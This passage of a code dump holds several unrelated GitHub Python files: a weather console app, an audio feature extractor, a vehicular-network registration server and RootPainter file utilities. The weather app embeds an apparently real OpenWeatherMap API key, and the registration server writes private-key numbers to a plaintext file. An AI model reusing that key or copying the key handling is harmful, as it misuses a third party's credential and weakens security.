\"Madrid,es\",\n    \"Stockholm,se\",\n    \"Tunis,tn\",\n    \"Ankara,tr\",\n    \"Toshloq,uz\",\n    \"Cardiff,gb\",\n    \"Mustaba,ye\",\n    \"Valletta,mt\",\n    \"Porto Novo,pt\",\n    \"Chicago,il,us\",\n    \"Rome,it\",\n    \"Kairo,eg\",\n    \"Sofia,bg\",\n    \"Kyoto,jp\",\n]\n\n\n# function that gets the city info from openweathermap.org\ndef get_city_info(city):\n    searched_city = city.replace(\" \", \"%20\")\n    # the f-string already substitutes searched_city, so no .replace() is needed\n    url = f\"https://api.openweathermap.org/geo/1.0/direct?q={searched_city}&limit=5&appid=e66bdef54de4e4b80c94c1571cac6d4c\"\n    response = requests.get(url)\n    data_array = []\n\n    if response.status_code == 200:\n        data = response.json()\n        data_array.append(data)\n        for i in data_array:\n            city_data = i[0]\n            short_city_data = {\n                \"name\": city_data[\"name\"],\n                \"lat\": city_data[\"lat\"],\n                \"lon\": city_data[\"lon\"],\n                \"country\": city_data[\"country\"],\n            }\n            get_weather_data(\n                short_city_data[\"lat\"], short_city_data[\"lon\"], short_city_data[\"name\"]\n            )\n    else:\n        print(\"Error: \", response.status_code)\n# end of get_city_info\n\n\n# gets the weather info for any given city\ndef get_weather_data(lat, lon, city):\n    weather_url = f\"https://api.openweathermap.org/data/2.5/weather?lat={lat}&lon={lon}&units=metric&appid=e66bdef54de4e4b80c94c1571cac6d4c\"\n    response = requests.get(weather_url)\n\n    weather_data_array = []\n    if response.status_code == 200:\n        data = response.json()\n        weather_data_array.append(data)\n\n    for weather_city_data in weather_data_array:\n        short_weather_data = {\n            \"name\": city,\n            \"temp\": weather_city_data[\"main\"][\"temp\"],\n            \"humidity\": weather_city_data[\"main\"][\"humidity\"],\n            \"description\": weather_city_data[\"weather\"][0][\"description\"],\n        }\n        print(\n            f'City: {short_weather_data[\"name\"]}\\nTemperature: {short_weather_data[\"temp\"]} C\\nHumidity: {short_weather_data[\"humidity\"]} %\\nThe weather in {short_weather_data[\"name\"]} is {short_weather_data[\"description\"]}.\\n'\n        )\n
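\n# Editor's note (sketch): the two endpoints above are OpenWeatherMap's geocoding\n# API (/geo/1.0/direct), which resolves \"City,CC\" to lat/lon, and the current\n# weather API (/data/2.5/weather), which is then queried with those coordinates.\n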
\n\n# choose either 5 random cities or one selected by user\nusr_choice = input(\n    \"Do you want to choose the city? (y/n) If no, then weather information for 5 random cities will be generated: \"\n)\nacceptable_answers = [\"y\", \"n\", \"yes\", \"no\"]\n\nif usr_choice.lower() not in acceptable_answers:\n    usr_choice = input(\"Please enter a valid response - y/n: \")\nshould_generate_cities = False\nif \"y\" in usr_choice.lower():\n    usr_city = input(\n        \"Please enter a valid city name and country code, separated by comma, no spaces {city_name,st}: \"\n    )\n    res = get_city_info(usr_city)\nelse:\n    should_generate_cities = True\n    rand_cities = []\n    rand_cities_weather_data = []\n    while len(rand_cities) < 5:\n        random_num = random.randint(0, len(cities) - 1)  # randint is inclusive on both ends\n        if not cities[random_num] in rand_cities:\n            rand_cities.append(cities[random_num])\n    for rand_city in rand_cities:\n        get_city_info(rand_city)\n# end of logic for user choice\n","repo_name":"rmitusis/Weather-App","sub_path":"Task 1 - Console Weather App/weather_app.py","file_name":"weather_app.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"10167320273","text":"# hibobi project\na = [1, 2, 4, 2, 4, 5, 6, 5, 7, 8, 9, 0]\nb = {}\nb = b.fromkeys(a)  # dict.fromkeys deduplicates while preserving order\nc = list(b.keys())\nprint(c)\nprint(dir(b))\nwith open(\"/Users/xiaotaozi/Downloads/ces\") as f:\n    print(f.read())\n","repo_name":"NamedWu/intertest","sub_path":"hibobi/testcase/case.py","file_name":"case.py","file_ext":"py","file_size_in_byte":180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5267539079","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 11 21:07:37 2021\n\n@author: Yashi\n\"\"\"\n\nimport librosa\nimport numpy as np\nimport scipy.stats\nimport csv\n\n\n# function to calculate statistical features\ndef describe_freq(freqs):\n    mean = np.mean(freqs)\n    std = np.std(freqs)\n    maxv = np.amax(freqs)\n    minv = np.amin(freqs)\n    median = np.median(freqs)\n    skew = scipy.stats.skew(freqs)\n    kurt = scipy.stats.kurtosis(freqs)\n    q1 = np.quantile(freqs, 0.25)\n    q3 = np.quantile(freqs, 0.75)\n    mode = scipy.stats.mode(freqs)[0][0]\n    iqr = scipy.stats.iqr(freqs)\n\n    d = dict()\n    d['mean'] = mean\n    d['sd'] = std\n    d['maxv'] = maxv\n    d['minv'] = minv\n    d['median'] = median\n    d['skew'] = skew\n    d['kurtosis'] = kurt\n    d['q1'] = q1\n    d['q3'] = q3\n    d['mode'] = mode\n    d['iqr'] = iqr\n\n    return d\n# END OF FUNCTION\n\n\npath = 'E:/Major Project/operation for one file/sen.wav'\nx, sr = librosa.load(path)\nfreqs = np.fft.fftfreq(x.size)\nresult = describe_freq(freqs)\n\n# writing the features to a CSV file\nheader = ['mean', 'sd', 'maxv', 'minv', 'median', 'skew', 'kurtosis', 'q1', 'q3', 'mode', 'iqr']\nfile = open('data.csv', 'w', newline='')\nwith file:\n    writer = csv.DictWriter(file, fieldnames=header)\n    writer.writeheader()\n    writer.writerow(result)\n","repo_name":"gyashi529/Gender-and-Age-recognition-using-ANN","sub_path":"Feature extraction for one file/onefile.py","file_name":"onefile.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"36994044628","text":"import time\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives.asymmetric import ec\nfrom cryptography.hazmat.primitives import serialization\nimport string\nimport secrets\nimport socket\nfrom struct import pack, unpack\nfrom base64 import b16encode, b16decode\nimport threading\n\n\nDELTA_T = 1\n\n\ndef generate_random_alphanumeric_string(length: int) -> str:\n    \"\"\"\n    Generate a random password with at least one lowercase letter,\n    one uppercase letter, and one digit.\n    \"\"\"\n    alphabet = string.ascii_letters + string.digits\n\n    while True:\n        password = ''.join(secrets.choice(alphabet) for i in range(length))\n        if (any(c.islower() for c in password)\n                and any(c.isupper() for c in password)\n                and any(c.isdigit() for c in password)):\n            return password\n\n\ndef bytes_XOR(byte1: bytes, byte2: bytes) -> bytes:\n    \"\"\"\n    Calculate the XOR of two byte strings.\n    \"\"\"\n    length = max(len(byte1), len(byte2))\n\n    int_var = int.from_bytes(byte1, byteorder='big')\n    int_key = int.from_bytes(byte2, byteorder='big')\n    int_enc = int_var ^ int_key\n    return int_enc.to_bytes(length, byteorder='big')\n\n\n'''\nUtility function to send byte stream data with length to the socket.\nSends the length first by packing it into a 4 byte integer.\n'''\ndef send_data_with_length(data: bytes, socket: socket.socket):\n    length = len(data)\n    socket.sendall(pack('>I', length))\n    socket.sendall(data)\n
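\n# Editor's sketch (hypothetical wire example): with this framing, b\"hello\"\n# goes out as pack('>I', 5) + b\"hello\" == b\"\\x00\\x00\\x00\\x05hello\"; the\n# receiver below reads the 4-byte big-endian header before the payload.\n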
\n'''\nUtility function to receive bytes data from the TCP stream.\nData is accompanied by its length first.\n'''\ndef recv_data_with_length(s: socket.socket) -> bytes:\n    data_len = s.recv(4)\n    data_len = unpack('>I', data_len)[0]\n    data = s.recv(data_len)\n    return data\n\n\ndef register_vehicles(conn: socket.socket):\n    # Public and private key computation\n    RCvi = int(input(\"Enter RCvi: \"))\n    IDvi = generate_random_alphanumeric_string(10)\n\n    RN = secrets.randbits(128)\n\n    hash = hashes.Hash(hashes.SHA256())\n    hash.update(IDvi.encode())\n    hash.update(bin(RN)[2:].encode())\n    private_key_number = hash.finalize()\n    private_key_number = int.from_bytes(private_key_number, byteorder='big')\n    private_key = ec.derive_private_key(private_key_number, ec.SECP256K1())\n\n    public_key = private_key.public_key()\n    public_key_bytes = public_key.public_bytes(\n        encoding=serialization.Encoding.PEM,\n        format=serialization.PublicFormat.SubjectPublicKeyInfo\n    )\n\n    private_key_bytes = private_key.private_bytes(\n        encoding=serialization.Encoding.PEM,\n        format=serialization.PrivateFormat.PKCS8,\n        encryption_algorithm=serialization.NoEncryption()\n    )\n\n    # Calculation of Avi\n    hash = hashes.Hash(hashes.SHA256())\n    hash.update(bin(RCvi)[2:].encode())\n    Avi = bytes_XOR(hash.finalize(), IDvi.encode())\n\n    # Calculation of IDV*\n    hash = hashes.Hash(hashes.SHA256())\n    hash.update(IDvi.encode())\n    hash.update(bin(RCvi)[2:].encode())\n    ctime = int(time.time())\n    hash.update(str(ctime).encode())\n    IDV_star = hash.finalize()\n\n    # Sending data\n    send_data_with_length(Avi, conn)\n    send_data_with_length(public_key_bytes, conn)\n    send_data_with_length(IDV_star, conn)\n    send_data_with_length(str(ctime).encode(), conn)\n\n    # Receiving data\n    response = recv_data_with_length(conn).decode()\n    if response == 'TIMEOUT ERROR':\n        print('Timeout error')\n        conn.close()\n        return\n\n    if response != '200 OK':\n        print('Error in registration. IDvi* does not match.')\n        conn.close()\n        return\n\n    B = recv_data_with_length(conn)\n    D = recv_data_with_length(conn)\n    BC = recv_data_with_length(conn)\n    rtime = int(recv_data_with_length(conn).decode())\n\n    ctime = int(time.time())\n\n    if ctime - rtime > DELTA_T:\n        print('Timeout error')\n        send_data_with_length(b'TIMEOUT ERROR', conn)\n        conn.close()\n        return\n\n    # Calculation of AID\n    hash = hashes.Hash(hashes.SHA256())\n    hash.update(IDvi.encode())\n    hash.update(B)\n    AID = hash.finalize()\n\n    # Calculation of C\n    hash = hashes.Hash(hashes.SHA256())\n    hash.update(AID)\n    hash.update(bin(RCvi)[2:].encode())\n    hash.update(str(rtime).encode())\n    C = bytes_XOR(hash.finalize(), D)\n\n    # Calculation of BC\n    hash = hashes.Hash(hashes.SHA256())\n    hash.update(B)\n    hash.update(C)\n    hash.update(AID)\n    hash.update(str(rtime).encode())\n    BC_star = hash.finalize()\n
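\n    # Editor's note (sketch): BC binds B, C, AID and the timestamp together,\n    # so recomputing the same SHA-256 over (B || C || AID || rtime) locally and\n    # comparing below detects tampering with any of the four values in transit.\n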
\n    if BC_star != BC:\n        print('Error in registration. BC does not match.')\n        send_data_with_length(b\"BC ERROR\", conn)\n        conn.close()\n        return\n    else:\n        send_data_with_length(b\"200 OK\", conn)\n\n    with open(\"TA_private.pem\", \"rb\") as f:\n        TA_private_key = f.read()\n\n    hash = hashes.Hash(hashes.SHA256())\n    hash.update(private_key_bytes)\n    hash.update(TA_private_key)\n    E = bytes_XOR(hash.finalize(), C)\n    E = bytes_XOR(E, B)\n\n    # KeyRV\n    hash = hashes.Hash(hashes.SHA256())\n    hash.update(bytes_XOR(public_key_bytes, C))\n    KeyRV = hash.finalize()\n\n    # F\n    hash1 = hashes.Hash(hashes.SHA256())\n    hash1.update(private_key_bytes)\n    hash1.update(TA_private_key)\n\n    hash2 = hashes.Hash(hashes.SHA256())\n    hash2.update(IDvi.encode())\n    hash2.update(C)\n    F = bytes_XOR(hash1.finalize(), hash2.finalize())\n\n    with open(\"Vehicle_Users.txt\", \"a\") as f:\n        f.write(IDvi + \",\" + b16encode(AID).decode() + \",\" + str(private_key_number) + \",\" + b16encode(KeyRV).decode() + \"\\n\")\n\n    conn.close()\n\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect(('localhost', 7080))\n    print(\"Connected to OBU\")\n\n    send_data_with_length(B, s)\n    send_data_with_length(E, s)\n    send_data_with_length(F, s)\n    send_data_with_length(public_key_bytes, s)\n    s.close()\n\n    print(\"Registration Successful\")\n\n\ndef register_RSU(conn: socket.socket):\n    with open(\"TA_ID.txt\", \"r\") as f:\n        TA_ID = f.read()\n\n    send_data_with_length(TA_ID.encode(), conn)\n\n    with open(\"Vehicle_Users.txt\", \"r\") as f:\n        data = f.read()\n\n    send_data_with_length(data.encode(), conn)\n    conn.close()\n\n\ndef handle_client(conn: socket.socket):\n    response = recv_data_with_length(conn).decode()\n\n    if response == 'VU':\n        register_vehicles(conn)\n    elif response == 'RSU':\n        register_RSU(conn)\n    # elif response == 'PSO':\n    #     register_PSO(conn)\n\n\ndef main():\n    # Creating TA server\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    s.bind(('127.0.0.1', 7070))\n    s.listen(1)\n\n    f = open(\"Vehicle_Users.txt\", \"w\")\n    f.write(\"ID,AID,TPR,KeyRV\\n\")\n    f.close()\n\n    # Accepting connections\n    try:\n        while True:\n            # Wait for a connection\n            newsocket, fromaddr = s.accept()\n            t1 = threading.Thread(target=handle_client, args=(newsocket,))\n            t1.daemon = True  # setDaemon() is deprecated since Python 3.10\n            t1.start()\n    finally:\n        s.close()\n\n\nif __name__ == '__main__':\n    main()","repo_name":"vivmat08/SAMPARK","sub_path":"TA/TA_RegPhase.py","file_name":"TA_RegPhase.py","file_ext":"py","file_size_in_byte":7202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74554982075","text":"import os\nfrom os.path import splitext\nimport filecmp\nimport numpy as np\nfrom skimage.io import imread\n\ndef ls(dir_path):\n    # Don't show hidden files\n    # These can happen due to issues like file system\n    # synchronisation technology. RootPainter doesn't use them anywhere\n    fnames = os.listdir(dir_path)\n    fnames = [f for f in fnames if f[0] != '.']\n    return fnames\n
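\n# Editor's note (hypothetical example): ls('/some/dataset') keeps ordinary\n# image names but drops synced-folder artefacts such as '.DS_Store'.\n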
\ndef last_fname_with_annotations(fnames, train_annot_dir, val_annot_dir):\n    \"\"\"\n    Go through fnames and return the one after\n    the last in the list with an annotation.\n    If no annotations are found return None.\n    \"\"\"\n    last_fname = None\n    val_annot_fnames = os.listdir(str(val_annot_dir))\n    train_annot_fnames = os.listdir(str(train_annot_dir))\n    annot_fnames = val_annot_fnames + train_annot_fnames\n\n    # remove the extensions as annotations will always be PNG\n    # but fnames could be JPG or other.\n    annot_fnames = [os.path.splitext(f)[0] for f in annot_fnames]\n\n    for i, fname in enumerate(fnames):\n        if os.path.splitext(fname)[0] in annot_fnames:\n            if i + 1 < len(fnames):\n                last_fname = fnames[i + 1]\n            else:\n                return fnames[0]\n    return last_fname\n\n\ndef get_annot_path(fname, train_dir, val_dir):\n    \"\"\"\n    return path to annot if it is found in\n    train or val annot dirs.\n    Otherwise return None\n    \"\"\"\n    train_path = os.path.join(train_dir, fname)\n    val_path = os.path.join(val_dir, fname)\n    if os.path.isfile(train_path):\n        return train_path\n    if os.path.isfile(val_path):\n        return val_path\n    return None\n\n\ndef get_new_annot_target_dir(train_annot_dir, val_annot_dir):\n    \"\"\" Should we add new annotations to train or validation data? \"\"\"\n    train_annots = os.listdir(train_annot_dir)\n    val_annots = os.listdir(val_annot_dir)\n    train_annots = [f for f in train_annots if splitext(f)[1] == '.png']\n    val_annots = [f for f in val_annots if splitext(f)[1] == '.png']\n    num_train_annots = len(train_annots)\n    num_val_annots = len(val_annots)\n    # first aim to get at least one annotation in train and validation.\n    if num_train_annots == 0 and num_val_annots > 0:\n        return train_annot_dir\n    if num_train_annots > 0 and num_val_annots == 0:\n        return val_annot_dir\n    # then only add files to validation if there is at least 5x in train\n    if num_train_annots >= (num_val_annots * 5):\n        return val_annot_dir\n    return train_annot_dir\n\n\n# pylint: disable=R0913 # Too many arguments\ndef maybe_save_annotation(proj_location, annot_pixmap, annot_path, png_fname,\n                          train_annot_dir, val_annot_dir):\n    # First save to project folder as temp file.\n    temp_out = os.path.join(proj_location, 'temp_annot.png')\n    annot_pixmap.save(temp_out, 'PNG')\n\n    # if there is an existing annotation.\n    if annot_path:\n        # and the annot we are saving is different.\n        if not filecmp.cmp(temp_out, annot_path):\n            # Then we must over-write the previously saved annotation.\n            # The user is performing an edit, possibly correcting an error.\n            annot_pixmap.save(annot_path, 'PNG')\n    else:\n        # if there is not an existing annotation\n        # and the annotation has some content\n        if np.sum(imread(temp_out)):\n            # then find the best place to put it based on current counts.\n            annot_dir = get_new_annot_target_dir(train_annot_dir, val_annot_dir)\n            annot_path = os.path.join(annot_dir, png_fname)\n            annot_pixmap.save(annot_path, 'PNG')\n        else:\n            # if the annotation did not have content.\n            # and there was not an existing annotation\n            # then don't save anything, this data is useless for\n            # training.\n            print('not saving as annotation empty')\n\n    # clean up the temp file\n    while os.path.isfile(temp_out):\n        try:\n            # Added try catch because this error happened (very rarely)\n            # PermissionError: [WinError 32]\n            # The process cannot access the file because\n            # it is being used by another process\n            os.remove(temp_out)\n        except Exception as e:\n            print('Caught exception when trying to delete temp annot', e)\n    return annot_path\n
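\n# Editor's note (sketch): filecmp.cmp defaults to shallow=True, which compares\n# os.stat() signatures first and only falls back to contents when they differ;\n# a strict byte-for-byte check would pass shallow=False explicitly.\n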
","repo_name":"Abe404/root_painter","sub_path":"painter/src/main/python/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"96"}